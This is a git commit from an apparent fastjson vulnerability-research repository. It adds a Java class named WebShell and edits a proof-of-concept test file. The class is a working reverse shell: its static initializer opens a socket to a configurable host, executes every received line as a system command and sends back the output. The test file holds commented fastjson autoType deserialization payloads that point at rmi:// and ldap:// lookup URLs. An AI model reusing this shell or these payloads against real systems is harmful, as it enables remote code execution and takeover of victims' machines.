feat:add WebShell

“threedr3am” · “threedr3am” · commit dc8a8dccf171 · 2020-04-14T14:54:32.000+08:00
diff --git a/common/src/main/java/WebShell.java b/common/src/main/java/WebShell.java
@@ -0,0 +1,63 @@
+import java.io.BufferedReader;
+import java.io.BufferedWriter;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.io.OutputStreamWriter;
+import java.net.Socket;
+
+/**
+ * @author threedr3am
+ */
+public class WebShell {
+
+  private static final String host = "127.0.0.1";
+  private static final int port = 12123;
+
+  static {
+    try {
+      System.out.println("run shell...");
+      new Thread(() -> {
+        try {
+          Socket socket = new Socket(host, port);
+          BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
+          bufferedWriter.write("success!");
+          bufferedWriter.newLine();
+          bufferedWriter.flush();
+
+          BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
+          while (true) {
+            String line;
+            while ((line = bufferedReader.readLine()) == null);
+            Process pro = null;
+            try {
+              pro = Runtime.getRuntime().exec(line);
+            } catch (Exception e) {
+              e.printStackTrace();
+              bufferedWriter.write(e.getMessage());
+              bufferedWriter.newLine();
+              bufferedWriter.flush();
+            }
+            if (pro == null) {
+              continue;
+            }
+            BufferedReader read = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+            String line2;
+            while ((line2 = read.readLine()) != null) {
+              bufferedWriter.write(line2);
+              bufferedWriter.newLine();
+              bufferedWriter.flush();
+            }
+          }
+
+        } catch (IOException e) {
+          e.printStackTrace();
+        }
+      }).start();
+    } catch (Throwable e) {
+      e.printStackTrace();
+    }
+  }
+
+  public static void main(String[] args) {
+  }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java
@@ -35,14 +35,15 @@ public static void main(String[] args) {
 //      String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43658\",\"autoCommit\":true}}";
 //    String str = "{\"@type\":\"org.springframework.security.web.savedrequest.DefaultSavedRequest\",\"contextPath\": {\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}}";
         ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
-        String str = "{\"a\": {\"$ref\":\"$.class\"}}";
-        AAA aaa = JSON.parseObject(str, AAA.class);
+//        String str = "{\"a\": {\"$ref\":\"$.class\"}}";
+//        AAA aaa = JSON.parseObject(str, AAA.class);
 //        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
 //        String str = "{\"a\": {\"$ref\": \"$.a\"}, \"b\": {\"$ref\": \"$.b\"}, \"c\": {\"$ref\": \"$.c\"}, \"d\": {\"$ref\": \"$.d\"}}";
 //        JSON.parseObject(str, AAA.class);
 //        AAA aaa = new AAA();
-        System.out.println(aaa.getA());
-
+//        System.out.println(aaa.getA());
+        String json = "{\"\"}";
+        JSON.parse(json);
 //    JSON.parseObject(str);
     }
 }
